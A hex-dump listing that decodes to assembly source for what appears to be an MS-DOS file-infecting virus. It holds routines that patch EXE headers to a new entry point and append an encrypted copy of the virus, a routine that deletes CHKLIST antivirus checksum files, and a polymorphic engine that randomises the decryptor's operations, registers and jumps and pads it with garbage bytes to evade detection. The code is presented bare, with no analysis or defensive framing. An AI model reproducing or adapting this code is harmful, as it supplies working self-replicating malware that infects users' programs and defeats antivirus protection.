|00003030| 79 0a 09 64 69 76 09 63 | 78 0a 0a 09 6d 6f 76 09 |y..div.c|x...mov.|
|00003040| 77 6f 72 64 20 70 74 72 | 20 65 78 65 5f 68 65 61 |word ptr| exe_hea|
|00003050| 64 65 72 2b 31 34 68 2c | 64 78 20 3b 20 73 61 76 |der+14h,|dx ; sav|
|00003060| 65 20 6e 65 77 20 65 6e | 74 72 79 20 70 6f 69 6e |e new en|try poin|
|00003070| 74 0a 09 6d 6f 76 09 77 | 6f 72 64 20 70 74 72 20 |t..mov.w|ord ptr |
|00003080| 65 78 65 5f 68 65 61 64 | 65 72 2b 31 36 68 2c 61 |exe_head|er+16h,a|
|00003090| 78 0a 09 6d 6f 76 09 72 | 65 6c 5f 6f 66 66 2c 64 |x..mov.r|el_off,d|
|000030a0| 78 09 09 3b 20 73 61 76 | 65 20 69 74 20 66 6f 72 |x..; sav|e it for|
|000030b0| 20 65 6e 63 72 79 70 74 | 6f 72 0a 09 6d 6f 76 09 | encrypt|or..mov.|
|000030c0| 62 70 5f 63 61 6c 63 2c | 64 78 0a 0a 09 63 61 6c |bp_calc,|dx...cal|
|000030d0| 6c 09 65 6e 63 72 79 70 | 74 5f 63 6f 64 65 09 09 |l.encryp|t_code..|
|000030e0| 3b 20 65 6e 63 72 79 70 | 74 20 26 20 63 6f 70 79 |; encryp|t & copy|
|000030f0| 20 74 68 65 20 63 6f 64 | 65 0a 0a 09 6d 6f 76 09 | the cod|e...mov.|
|00003100| 63 78 2c 6f 66 66 73 65 | 74 20 68 65 61 70 2b 30 |cx,offse|t heap+0|
|00003110| 46 46 68 09 3b 20 76 69 | 72 75 73 20 73 69 7a 65 |FFh.; vi|rus size|
|00003120| 2b 78 74 72 61 0a 09 61 | 64 64 09 63 6c 2c 73 69 |+xtra..a|dd.cl,si|
|00003130| 7a 65 5f 64 69 73 70 09 | 09 3b 20 61 64 64 20 72 |ze_disp.|.; add r|
|00003140| 61 6e 64 6f 6d 20 5e 69 | 6e 20 63 61 73 65 20 63 |andom ^i|n case c|
|00003150| 6c 20 65 78 63 65 65 64 | 73 20 46 46 68 0a 09 6c |l exceed|s FFh..l|
|00003160| 65 61 09 64 78 2c 76 65 | 6e 64 09 09 09 3b 20 6e |ea.dx,ve|nd...; n|
|00003170| 65 77 20 63 6f 70 79 20 | 69 6e 20 68 65 61 70 0a |ew copy |in heap.|
|00003180| 09 6d 6f 76 09 61 68 2c | 34 30 68 09 09 09 3b 20 |.mov.ah,|40h...; |
|00003190| 77 72 69 74 65 20 74 68 | 65 20 64 61 6d 6e 20 74 |write th|e damn t|
|000031a0| 68 69 6e 67 0a 09 69 6e | 74 09 32 31 68 0a 0a 09 |hing..in|t.21h...|
|000031b0| 70 6f 70 09 61 78 20 64 | 78 09 09 09 3b 20 41 58 |pop.ax d|x...; AX|
|000031c0| 3a 44 58 20 66 69 6c 65 | 20 73 69 7a 65 0a 0a 09 |:DX file| size...|
|000031d0| 6d 6f 76 09 63 78 2c 28 | 6f 66 66 73 65 74 20 68 |mov.cx,(|offset h|
|000031e0| 65 61 70 2d 6f 66 66 73 | 65 74 20 73 74 61 72 74 |eap-offs|et start|
|000031f0| 29 2b 30 46 46 68 20 3b | 20 69 66 20 78 63 65 65 |)+0FFh ;| if xcee|
|00003200| 64 73 20 66 66 20 62 65 | 6c 6f 77 0a 09 61 64 64 |ds ff be|low..add|
|00003210| 09 63 6c 2c 73 69 7a 65 | 5f 64 69 73 70 0a 09 61 |.cl,size|_disp..a|
|00003220| 64 63 09 61 78 2c 63 78 | 0a 0a 09 6d 6f 76 09 63 |dc.ax,cx|...mov.c|
|00003230| 6c 2c 39 09 09 09 3b 20 | 63 61 6c 63 20 6e 65 77 |l,9...; |calc new|
|00003240| 20 61 6c 6c 6f 63 20 28 | 35 31 32 29 0a 09 70 75 | alloc (|512)..pu|
|00003250| 73 68 09 61 78 0a 09 73 | 68 72 09 61 78 2c 63 6c |sh.ax..s|hr.ax,cl|
|00003260| 0a 09 72 6f 72 09 64 78 | 2c 63 6c 0a 09 73 74 63 |..ror.dx|,cl..stc|
|00003270| 0a 09 61 64 63 09 64 78 | 2c 61 78 0a 09 70 6f 70 |..adc.dx|,ax..pop|
|00003280| 09 61 78 0a 09 61 6e 64 | 09 61 68 2c 31 0a 0a 09 |.ax..and|.ah,1...|
|00003290| 6d 6f 76 09 77 6f 72 64 | 20 70 74 72 20 65 78 65 |mov.word| ptr exe|
|000032a0| 5f 68 65 61 64 65 72 2b | 34 68 2c 64 78 20 3b 20 |_header+|4h,dx ; |
|000032b0| 73 61 76 65 20 6e 65 77 | 20 6d 65 6d 2e 20 61 6c |save new| mem. al|
|000032c0| 6c 6f 63 20 69 6e 66 6f | 0a 09 6d 6f 76 09 77 6f |loc info|..mov.wo|
|000032d0| 72 64 20 70 74 72 20 65 | 78 65 5f 68 65 61 64 65 |rd ptr e|xe_heade|
|000032e0| 72 2b 32 68 2c 61 78 0a | 0a 77 72 69 74 65 5f 68 |r+2h,ax.|.write_h|
|000032f0| 64 72 3a 0a 09 63 61 6c | 6c 09 6f 66 66 73 65 74 |dr:..cal|l.offset|
|00003300| 5f 7a 65 72 6f 09 09 3b | 20 70 6f 73 69 74 69 6f |_zero..;| positio|
|00003310| 6e 20 70 74 72 20 74 6f | 20 62 65 67 69 6e 6e 69 |n ptr to| beginni|
|00003320| 6e 67 0a 0a 09 6d 6f 76 | 09 63 78 2c 31 38 68 09 |ng...mov|.cx,18h.|
|00003330| 09 09 3b 20 77 72 69 74 | 65 20 66 69 58 65 64 20 |..; writ|e fiXed |
|00003340| 68 65 61 64 65 72 0a 09 | 6c 65 61 09 64 78 2c 65 |header..|lea.dx,e|
|00003350| 78 65 5f 68 65 61 64 65 | 72 0a 09 6d 6f 76 09 61 |xe_heade|r..mov.a|
|00003360| 68 2c 34 30 68 0a 09 69 | 6e 74 09 32 31 68 0a 0a |h,40h..i|nt.21h..|
|00003370| 09 6a 6d 70 09 64 5f 74 | 69 6d 65 09 09 09 3b 20 |.jmp.d_t|ime...; |
|00003380| 72 65 73 74 6f 72 65 20 | 73 68 69 74 2f 72 65 74 |restore |shit/ret|
|00003390| 75 72 6e 0a 0a 0a 3b 2d | 2d 2d 2d 2d 2d 2d 2d 2d |urn...;-|--------|
|000033a0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|000033b0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|000033c0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|000033d0| 2d 0a 3b 20 4b 69 6c 6c | 20 43 48 4b 4c 49 53 54 |-.; Kill| CHKLIST|
|000033e0| 2e 2a 20 66 69 6c 65 7a | 20 62 79 20 6e 75 6c 6c |.* filez| by null|
|000033f0| 69 6e 67 20 61 74 74 72 | 69 62 73 2c 20 74 68 65 |ing attr|ibs, the|
|00003400| 6e 20 64 65 6c 65 74 69 | 6e 67 0a 3b 20 70 68 69 |n deleti|ng.; phi|
|00003410| 6c 65 2e 0a 3b 0a 0a 6b | 69 6c 6c 5f 63 68 6b 6c |le..;..k|ill_chkl|
|00003420| 73 74 3a 0a 09 6d 6f 76 | 09 64 69 2c 32 09 09 09 |st:..mov|.di,2...|
|00003430| 3b 20 63 6f 75 6e 74 65 | 72 20 66 6f 72 20 6c 6f |; counte|r for lo|
|00003440| 6f 70 0a 09 6c 65 61 09 | 64 78 2c 63 68 6b 6c 31 |op..lea.|dx,chkl1|
|00003450| 09 09 3b 20 66 69 72 73 | 74 20 66 6e 61 6d 65 20 |..; firs|t fname |
|00003460| 74 6f 20 6b 69 6c 6c 0a | 6b 69 6c 6c 5f 6c 6f 6f |to kill.|kill_loo|
|00003470| 70 3a 0a 09 6d 6f 76 09 | 61 78 2c 34 33 30 31 68 |p:..mov.|ax,4301h|
|00003480| 09 09 3b 20 72 65 73 65 | 74 20 61 74 74 72 69 62 |..; rese|t attrib|
|00003490| 73 0a 09 78 6f 72 09 63 | 78 2c 63 78 0a 09 69 6e |s..xor.c|x,cx..in|
|000034a0| 74 09 32 31 68 0a 09 6d | 6f 76 09 61 68 2c 34 31 |t.21h..m|ov.ah,41|
|000034b0| 68 09 09 09 3b 20 64 65 | 6c 65 74 65 20 70 68 69 |h...; de|lete phi|
|000034c0| 6c 65 0a 09 69 6e 74 09 | 32 31 68 0a 09 6c 65 61 |le..int.|21h..lea|
|000034d0| 09 64 78 2c 63 68 6b 6c | 32 09 09 3b 20 73 65 63 |.dx,chkl|2..; sec|
|000034e0| 6f 6e 64 20 66 6e 61 6d | 65 20 74 6f 20 6b 69 6c |ond fnam|e to kil|
|000034f0| 6c 0a 09 64 65 63 09 64 | 69 0a 09 6a 6e 7a 09 6b |l..dec.d|i..jnz.k|
|00003500| 69 6c 6c 5f 6c 6f 6f 70 | 0a 0a 09 72 65 74 0a 0a |ill_loop|...ret..|
|00003510| 3b 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |;-------|--------|
|00003520| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00003530| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00003540| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 0a 3b 20 73 65 |--------|---.; se|
|00003550| 74 20 66 69 6c 65 20 70 | 74 72 0a 0a 6f 66 66 73 |t file p|tr..offs|
|00003560| 65 74 5f 7a 65 72 6f 3a | 20 09 09 09 09 3b 20 73 |et_zero:| ....; s|
|00003570| 65 6c 66 20 65 78 70 6c | 61 6e 69 74 6f 72 79 0a |elf expl|anitory.|
|00003580| 09 78 6f 72 09 61 6c 2c | 61 6c 0a 09 6a 6d 70 09 |.xor.al,|al..jmp.|
|00003590| 73 65 74 5f 66 70 0a 6f | 66 66 73 65 74 5f 65 6e |set_fp.o|ffset_en|
|000035a0| 64 3a 0a 09 6d 6f 76 09 | 61 6c 2c 30 32 68 0a 73 |d:..mov.|al,02h.s|
|000035b0| 65 74 5f 66 70 3a 0a 09 | 6d 6f 76 09 61 68 2c 34 |et_fp:..|mov.ah,4|
|000035c0| 32 68 0a 09 78 6f 72 09 | 63 78 2c 63 78 0a 09 78 |2h..xor.|cx,cx..x|
|000035d0| 6f 72 09 64 78 2c 64 78 | 0a 09 69 6e 74 09 32 31 |or.dx,dx|..int.21|
|000035e0| 68 0a 09 72 65 74 0a 0a | 3b 2d 2d 2d 2d 2d 2d 2d |h..ret..|;-------|
|000035f0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00003600| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00003610| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00003620| 2d 2d 2d 0a 3b 20 4d 6f | 72 70 68 2c 20 63 6f 70 |---.; Mo|rph, cop|
|00003630| 79 2c 20 26 20 63 72 79 | 70 74 0a 3b 0a 3b 20 20 |y, & cry|pt.;.; |
|00003640| 30 20 62 79 74 65 73 20 | 63 6f 6e 73 74 61 6e 74 |0 bytes |constant|
|00003650| 0a 3b 20 20 30 20 6f 70 | 65 72 61 6e 64 73 20 69 |.; 0 op|erands i|
|00003660| 6e 20 63 6f 6e 73 74 61 | 6e 74 20 6c 6f 63 61 74 |n consta|nt locat|
|00003670| 69 6f 6e 73 0a 3b 0a 3b | 20 6d 73 3a 0a 3b 20 20 |ions.;.;| ms:.; |
|00003680| 20 62 69 74 20 37 0a 3b | 20 20 20 20 20 20 20 36 | bit 7.;| 6|
|00003690| 0a 3b 20 20 20 20 20 20 | 20 35 0a 3b 20 20 20 20 |.; | 5.; |
|000036a0| 20 20 20 34 20 20 2d 20 | 49 4e 43 52 45 4d 45 4e | 4 - |INCREMEN|
|000036b0| 54 20 43 4f 55 4e 54 45 | 52 20 4f 50 0a 3b 20 20 |T COUNTE|R OP.; |
|000036c0| 20 20 20 20 20 33 20 20 | 2d 20 0a 3b 20 20 20 20 | 3 |- .; |
|000036d0| 20 20 20 32 20 20 2d 20 | 49 4e 43 52 45 4d 45 4e | 2 - |INCREMEN|
|000036e0| 54 20 45 4e 43 52 59 50 | 54 4f 52 20 4f 50 0a 3b |T ENCRYP|TOR OP.;|
|000036f0| 20 20 20 20 20 20 20 31 | 20 20 2d 20 41 44 44 26 | 1| - ADD&|
|00003700| 53 55 42 7c 58 4f 52 0a | 3b 20 20 20 20 20 20 20 |SUB|XOR.|; |
|00003710| 30 20 20 2d 20 57 4f 52 | 44 7c 42 59 54 45 0a 3b |0 - WOR|D|BYTE.;|
|00003720| 20 20 20 20 20 20 49 46 | 3c 32 30 2d 53 45 4c 45 | IF|<20-SELE|
|00003730| 43 54 49 4f 4e 20 42 45 | 54 57 45 45 4e 20 4a 4e |CTION BE|TWEEN JN|
|00003740| 5a 20 41 4e 44 20 4a 4e | 53 0a 3b 20 20 20 20 20 |Z AND JN|S.; |
|00003750| 20 49 46 3c 35 2d 44 4f | 4e 27 54 20 57 52 49 54 | IF<5-DO|N'T WRIT|
|00003760| 45 20 45 4e 43 52 59 50 | 54 49 4f 4e 20 4f 50 53 |E ENCRYP|TION OPS|
|00003770| 21 0a 3b 20 73 65 63 3a | 0a 3b 20 20 20 20 20 20 |!.; sec:|.; |
|00003780| 49 46 3c 3d 35 2d 75 73 | 65 20 63 6f 6e 73 74 61 |IF<=5-us|e consta|
|00003790| 6e 74 20 4e 4f 50 20 69 | 6e 73 74 65 61 64 20 6f |nt NOP i|nstead o|
|000037a0| 66 20 72 61 6e 64 6f 6d | 0a 3b 0a 65 6e 63 72 79 |f random|.;.encry|
|000037b0| 70 74 5f 63 6f 64 65 3a | 0a 0a 09 70 75 73 68 09 |pt_code:|...push.|
|000037c0| 62 78 09 09 09 3b 20 73 | 61 76 65 20 74 68 65 20 |bx...; s|ave the |
|000037d0| 68 61 6e 64 6c 65 0a 0a | 3b 2d 2d 2d 2d 20 46 69 |handle..|;---- Fi|
|000037e0| 6c 6c 20 62 75 66 66 65 | 72 20 73 70 61 63 65 20 |ll buffe|r space |
|000037f0| 77 69 74 68 20 67 61 72 | 62 61 67 65 20 62 79 74 |with gar|bage byt|
|00003800| 65 73 0a 0a 09 6c 65 61 | 09 64 69 2c 65 6e 63 72 |es...lea|.di,encr|
|00003810| 79 70 74 09 09 3b 20 66 | 69 6c 6c 20 62 75 66 66 |ypt..; f|ill buff|
|00003820| 65 72 20 2f 77 20 69 74 | 0a 09 6d 6f 76 09 62 70 |er /w it|..mov.bp|
|00003830| 2c 65 6e 63 5f 73 69 7a | 65 2b 31 0a 09 63 61 6c |,enc_siz|e+1..cal|
|00003840| 6c 09 66 69 6c 6c 5f 62 | 75 66 66 65 72 0a 0a 3b |l.fill_b|uffer..;|
|00003850| 2d 2d 2d 2d 20 52 61 6e | 64 6f 6d 6c 79 20 73 65 |---- Ran|domly se|
|00003860| 6c 65 63 74 20 62 65 74 | 77 65 65 6e 20 6a 6d 70 |lect bet|ween jmp|
|00003870| 20 74 79 70 65 20 3a 20 | 4a 4e 5a 20 6f 72 20 4a | type : |JNZ or J|
|00003880| 4e 53 0a 0a 09 63 61 6c | 6c 09 67 65 74 5f 72 61 |NS...cal|l.get_ra|
|00003890| 6e 64 6f 6d 0a 09 6d 6f | 76 09 65 6e 63 5f 6e 75 |ndom..mo|v.enc_nu|
|000038a0| 6d 2c 64 6c 09 09 3b 20 | 73 74 6f 72 65 20 6d 73 |m,dl..; |store ms|
|000038b0| 20 63 6f 75 6e 74 20 66 | 6f 72 20 65 6e 63 72 79 | count f|or encry|
|000038c0| 70 74 69 6f 6e 0a 09 6d | 6f 76 09 6d 65 6d 5f 77 |ption..m|ov.mem_w|
|000038d0| 6f 72 64 2c 64 78 09 09 | 3b 20 6d 65 6d 20 63 72 |ord,dx..|; mem cr|
|000038e0| 79 70 74 69 6f 6e 20 74 | 6f 6f 0a 09 6d 6f 76 09 |yption t|oo..mov.|
|000038f0| 73 69 7a 65 5f 64 69 73 | 70 2c 64 6c 09 09 3b 20 |size_dis|p,dl..; |
|00003900| 61 6e 64 20 73 69 7a 65 | 20 64 69 73 70 6c 61 63 |and size| displac|
|00003910| 6d 65 6e 74 0a 0a 09 63 | 6d 70 09 64 6c 2c 32 30 |ment...c|mp.dl,20|
|00003920| 68 0a 09 6a 6c 09 6a 6d | 70 5f 32 0a 09 6d 6f 76 |h..jl.jm|p_2..mov|
|00003930| 09 62 79 74 65 20 70 74 | 72 20 6a 6e 7a 5f 6f 70 |.byte pt|r jnz_op|
|00003940| 2c 37 35 68 09 3b 20 75 | 73 65 20 6a 6e 7a 0a 09 |,75h.; u|se jnz..|
|00003950| 6a 6d 70 09 6a 6d 70 5f | 73 65 74 0a 09 6a 6d 70 |jmp.jmp_|set..jmp|
|00003960| 5f 32 3a 0a 09 6d 6f 76 | 09 62 79 74 65 20 70 74 |_2:..mov|.byte pt|
|00003970| 72 20 6a 6e 7a 5f 6f 70 | 2c 37 39 68 09 3b 20 6a |r jnz_op|,79h.; j|
|00003980| 6e 73 0a 09 6a 6d 70 5f | 73 65 74 3a 0a 0a 3b 2d |ns..jmp_|set:..;-|
|00003990| 2d 2d 2d 20 43 68 61 6e | 67 65 20 6a 75 6d 70 20 |--- Chan|ge jump |
|000039a0| 61 64 64 72 65 73 73 0a | 0a 09 63 6d 70 09 62 79 |address.|..cmp.by|
|000039b0| 74 65 20 70 74 72 20 6a | 6e 7a 5f 6f 70 2b 31 2c |te ptr j|nz_op+1,|
|000039c0| 6f 72 67 5f 6c 6f 6f 70 | 2b 6c 6f 6f 70 5f 64 69 |org_loop|+loop_di|
|000039d0| 73 70 5f 73 69 7a 65 20 | 3b 20 4a 4e 58 20 6f 6e |sp_size |; JNX on|
|000039e0| 20 6d 61 78 20 6f 66 66 | 73 65 74 3f 0a 09 6a 6e | max off|set?..jn|
|000039f0| 7a 09 69 6e 63 5f 6a 6d | 70 5f 6f 66 73 09 09 3b |z.inc_jm|p_ofs..;|
|00003a00| 20 69 66 20 6e 6f 74 20 | 74 68 65 6e 20 69 6e 63 | if not |then inc|
|00003a10| 20 74 68 65 20 70 74 72 | 0a 09 6d 6f 76 09 62 79 | the ptr|..mov.by|
|00003a20| 74 65 20 70 74 72 20 6a | 6e 7a 5f 6f 70 2b 31 2c |te ptr j|nz_op+1,|
|00003a30| 6f 72 67 5f 6c 6f 6f 70 | 20 3b 20 6a 75 6d 70 20 |org_loop| ; jump |
|00003a40| 74 6f 20 70 6f 73 20 58 | 20 69 6e 20 62 75 66 66 |to pos X| in buff|
|00003a50| 65 72 0a 09 69 6e 63 5f | 6a 6d 70 5f 6f 66 73 3a |er..inc_|jmp_ofs:|
|00003a60| 0a 09 69 6e 63 09 62 79 | 74 65 20 70 74 72 20 6a |..inc.by|te ptr j|
|00003a70| 6e 7a 5f 6f 70 2b 31 09 | 3b 20 69 6e 63 72 65 6d |nz_op+1.|; increm|
|00003a80| 65 6e 74 20 6a 6d 70 20 | 69 6e 74 6f 20 62 75 66 |ent jmp |into buf|
|00003a90| 66 65 72 0a 0a 3b 2d 2d | 2d 2d 20 43 68 61 6e 67 |fer..;--|-- Chang|
|00003aa0| 65 20 65 6e 63 72 79 70 | 74 69 6f 6e 20 74 79 70 |e encryp|tion typ|
|00003ab0| 65 20 72 61 6e 64 6f 6d | 6c 79 20 62 65 74 77 65 |e random|ly betwe|
|00003ac0| 65 6e 20 58 4f 52 20 61 | 6e 64 20 41 44 44 26 53 |en XOR a|nd ADD&S|
|00003ad0| 55 42 0a 0a 09 6d 6f 76 | 09 61 6c 2c 30 34 09 09 |UB...mov|.al,04..|
|00003ae0| 09 3b 20 64 65 66 61 75 | 6c 74 20 74 6f 20 65 6e |.; defau|lt to en|
|00003af0| 63 72 79 70 74 69 6e 67 | 20 41 44 44 0a 09 6d 6f |crypting| ADD..mo|
|00003b00| 76 09 65 6e 63 5f 74 79 | 70 65 2c 32 43 68 09 09 |v.enc_ty|pe,2Ch..|
|00003b10| 3b 20 61 6e 64 20 64 65 | 63 72 79 70 74 69 6e 67 |; and de|crypting|
|00003b20| 20 53 55 42 0a 09 74 65 | 73 74 09 64 6c 2c 30 30 | SUB..te|st.dl,00|
|00003b30| 30 30 30 30 31 30 62 09 | 09 3b 20 74 68 61 74 20 |000010b.|.; that |
|00003b40| 62 69 74 20 3d 31 3f 0a | 09 6a 7a 09 75 73 65 5f |bit =1?.|.jz.use_|
|00003b50| 61 64 64 5f 73 75 62 0a | 09 6d 6f 76 09 61 6c 2c |add_sub.|.mov.al,|
|00003b60| 33 34 68 09 09 09 3b 20 | 65 6e 63 72 79 70 74 69 |34h...; |encrypti|
|00003b70| 6e 67 20 58 4f 52 0a 09 | 6d 6f 76 09 65 6e 63 5f |ng XOR..|mov.enc_|
|00003b80| 74 79 70 65 2c 33 34 68 | 09 09 3b 20 64 65 63 72 |type,34h|..; decr|
|00003b90| 79 70 74 69 6e 67 20 58 | 4f 52 0a 09 75 73 65 5f |ypting X|OR..use_|
|00003ba0| 61 64 64 5f 73 75 62 3a | 0a 0a 3b 2d 2d 2d 20 43 |add_sub:|..;--- C|
|00003bb0| 68 61 6e 67 65 20 72 65 | 67 69 73 74 65 72 20 75 |hange re|gister u|
|00003bc0| 73 65 64 20 66 6f 72 20 | 74 68 65 20 63 6f 75 6e |sed for |the coun|
|00003bd0| 74 65 72 0a 0a 09 63 6d | 70 09 62 79 74 65 20 70 |ter...cm|p.byte p|
|00003be0| 74 72 20 63 6f 75 6e 74 | 5f 6f 70 2c 30 42 42 68 |tr count|_op,0BBh|
|00003bf0| 09 3b 20 73 6b 69 70 20 | 53 50 2f 42 50 2f 44 49 |.; skip |SP/BP/DI|
|00003c00| 2f 53 49 0a 09 6a 6e 7a | 09 67 65 74 5f 72 65 67 |/SI..jnz|.get_reg|
|00003c10| 0a 09 6d 6f 76 09 62 79 | 74 65 20 70 74 72 20 63 |..mov.by|te ptr c|
|00003c20| 6f 75 6e 74 5f 6f 70 2c | 30 42 37 68 09 3b 20 41 |ount_op,|0B7h.; A|
|00003c30| 58 2d 31 0a 09 6d 6f 76 | 09 62 79 74 65 20 70 74 |X-1..mov|.byte pt|
|00003c40| 72 20 64 65 63 5f 6f 70 | 2c 34 37 68 09 3b 20 41 |r dec_op|,47h.; A|
|00003c50| 58 2d 31 0a 09 67 65 74 | 5f 72 65 67 3a 0a 09 69 |X-1..get|_reg:..i|
|00003c60| 6e 63 09 62 79 74 65 20 | 70 74 72 20 63 6f 75 6e |nc.byte |ptr coun|
|00003c70| 74 5f 6f 70 09 3b 20 69 | 6e 63 72 65 6d 65 6e 74 |t_op.; i|ncrement|
|00003c80| 20 74 6f 20 6e 65 78 74 | 20 4f 50 0a 09 69 6e 63 | to next| OP..inc|
|00003c90| 09 62 79 74 65 20 70 74 | 72 20 64 65 63 5f 6f 70 |.byte pt|r dec_op|
|00003ca0| 09 09 3b 20 22 22 0a 0a | 3b 2d 2d 2d 2d 20 43 68 |..; ""..|;---- Ch|
|00003cb0| 61 6e 67 65 20 70 6f 73 | 69 74 69 6f 6e 20 6f 66 |ange pos|ition of|
|00003cc0| 20 49 4e 43 20 58 58 0a | 0a 09 6d 6f 76 09 64 69 | INC XX.|..mov.di|
|00003cd0| 2c 69 6e 63 5f 70 74 72 | 09 09 3b 20 67 65 74 20 |,inc_ptr|..; get |
|00003ce0| 6e 65 77 20 6f 66 66 20 | 66 6f 72 20 49 4e 43 20 |new off |for INC |
|00003cf0| 58 58 0a 09 63 6d 70 09 | 64 69 2c 69 6e 63 5f 62 |XX..cmp.|di,inc_b|
|00003d00| 75 66 5f 73 69 7a 65 09 | 09 3b 20 6d 61 78 20 70 |uf_size.|.; max p|
|00003d10| 6f 73 69 74 69 6f 6e 3f | 0a 09 6a 6c 09 67 6f 6f |osition?|..jl.goo|
|00003d20| 64 5f 69 6e 63 09 09 3b | 20 69 66 20 6e 6f 74 2e |d_inc..;| if not.|
|00003d30| 2e 74 68 65 6e 20 63 6f | 6e 74 69 6e 75 65 0a 09 |.then co|ntinue..|
|00003d40| 6d 6f 76 09 69 6e 63 5f | 70 74 72 2c 30 09 09 3b |mov.inc_|ptr,0..;|
|00003d50| 20 75 73 65 20 6f 66 66 | 73 65 74 20 31 20 6e 65 | use off|set 1 ne|
|00003d60| 78 74 20 72 75 6e 0a 09 | 78 6f 72 09 64 69 2c 64 |xt run..|xor.di,d|
|00003d70| 69 09 09 09 3b 20 75 73 | 65 20 6f 66 66 73 65 74 |i...; us|e offset|
|00003d80| 20 30 20 74 68 69 73 20 | 72 75 6e 0a 09 67 6f 6f | 0 this |run..goo|
|00003d90| 64 5f 69 6e 63 3a 0a 09 | 69 6e 63 09 69 6e 63 5f |d_inc:..|inc.inc_|
|00003da0| 70 74 72 09 09 09 3b 20 | 69 6e 63 72 65 6d 65 6e |ptr...; |incremen|
|00003db0| 74 20 74 68 65 20 70 74 | 72 20 66 6f 72 20 6e 65 |t the pt|r for ne|
|00003dc0| 78 74 0a 0a 3b 2d 2d 2d | 2d 20 54 6f 67 67 6c 65 |xt..;---|- Toggle|
|00003dd0| 20 62 65 74 77 65 65 6e | 20 53 49 20 61 6e 64 20 | between| SI and |
|00003de0| 44 49 0a 0a 09 63 6d 70 | 09 62 79 74 65 20 70 74 |DI...cmp|.byte pt|
|00003df0| 72 20 70 74 72 5f 73 65 | 74 2c 30 42 45 68 09 3b |r ptr_se|t,0BEh.;|
|00003e00| 20 75 73 69 6e 67 20 53 | 49 3f 0a 09 6a 7a 09 63 | using S|I?..jz.c|
|00003e10| 68 67 5f 64 69 09 09 09 | 3b 20 69 66 20 73 6f 2c |hg_di...|; if so,|
|00003e20| 20 74 68 65 6e 20 73 77 | 69 74 63 68 20 74 6f 20 | then sw|itch to |
|00003e30| 44 49 0a 09 6d 6f 76 09 | 62 79 74 65 20 70 74 72 |DI..mov.|byte ptr|
|00003e40| 20 69 6e 63 5f 62 75 66 | 5b 64 69 5d 2c 34 36 68 | inc_buf|[di],46h|
|00003e50| 20 3b 20 77 72 69 74 65 | 20 49 4e 43 20 53 49 0a | ; write| INC SI.|
|00003e60| 09 64 65 63 09 62 79 74 | 65 20 70 74 72 20 70 74 |.dec.byt|e ptr pt|
|00003e70| 72 5f 73 65 74 09 3b 20 | 64 65 63 72 65 6d 65 6e |r_set.; |decremen|
|00003e80| 74 20 74 6f 20 53 49 0a | 09 6a 6d 70 09 64 6f 6e |t to SI.|.jmp.don|
|00003e90| 65 5f 63 68 67 5f 70 74 | 72 0a 09 63 68 67 5f 64 |e_chg_pt|r..chg_d|
|00003ea0| 69 3a 0a 09 6d 6f 76 09 | 62 79 74 65 20 70 74 72 |i:..mov.|byte ptr|
|00003eb0| 20 69 6e 63 5f 62 75 66 | 5b 64 69 5d 2c 34 37 68 | inc_buf|[di],47h|
|00003ec0| 20 3b 20 77 72 69 74 65 | 20 49 4e 43 20 44 49 0a | ; write| INC DI.|
|00003ed0| 09 69 6e 63 09 62 79 74 | 65 20 70 74 72 20 70 74 |.inc.byt|e ptr pt|
|00003ee0| 72 5f 73 65 74 09 3b 20 | 69 6e 63 72 65 6d 65 6e |r_set.; |incremen|
|00003ef0| 74 20 74 6f 20 44 49 0a | 09 69 6e 63 09 62 79 74 |t to DI.|.inc.byt|
|00003f00| 65 20 70 74 72 20 65 6e | 63 5f 74 79 70 65 09 3b |e ptr en|c_type.;|
|00003f10| 20 69 6e 63 72 65 6d 65 | 6e 74 20 64 65 63 72 79 | increme|nt decry|
|00003f20| 70 74 6f 72 0a 09 69 6e | 63 09 61 78 09 09 09 3b |ptor..in|c.ax...;|
|00003f30| 20 69 6e 63 72 65 6d 65 | 6e 74 20 65 6e 63 72 79 | increme|nt encry|
|00003f40| 70 74 6f 72 0a 09 64 6f | 6e 65 5f 63 68 67 5f 70 |ptor..do|ne_chg_p|
|00003f50| 74 72 3a 0a 0a 3b 2d 2d | 2d 2d 20 53 65 6c 65 63 |tr:..;--|-- Selec|
|00003f60| 74 20 77 6f 72 64 20 6f | 72 20 62 79 74 65 20 65 |t word o|r byte e|
|00003f70| 6e 63 72 79 70 74 69 6f | 6e 0a 0a 09 6d 6f 76 09 |ncryptio|n...mov.|
|00003f80| 77 5f 62 2c 38 30 68 09 | 09 09 3b 20 64 65 66 61 |w_b,80h.|..; defa|
|00003f90| 75 6c 74 20 74 6f 20 62 | 79 74 65 20 63 72 79 70 |ult to b|yte cryp|
|00003fa0| 74 69 6f 6e 0a 09 74 65 | 73 74 09 64 6c 2c 30 30 |tion..te|st.dl,00|
|00003fb0| 30 30 30 30 30 31 62 09 | 09 3b 20 75 73 65 20 77 |000001b.|.; use w|
|00003fc0| 6f 72 64 3f 0a 09 6a 7a | 09 75 73 65 5f 62 79 74 |ord?..jz|.use_byt|
|00003fd0| 65 0a 09 6d 6f 76 09 77 | 5f 62 2c 38 31 68 09 09 |e..mov.w|_b,81h..|
|00003fe0| 09 3b 20 6e 6f 77 20 75 | 73 69 6e 67 20 77 6f 72 |.; now u|sing wor|
|00003ff0| 64 20 65 6e 2f 64 65 63 | 72 79 70 74 6f 72 0a 09 |d en/dec|ryptor..|
|00004000| 6d 6f 76 09 63 68 2c 62 | 79 74 65 20 70 74 72 20 |mov.ch,b|yte ptr |
|00004010| 69 6e 63 5f 62 75 66 5b | 64 69 5d 09 3b 20 67 65 |inc_buf[|di].; ge|
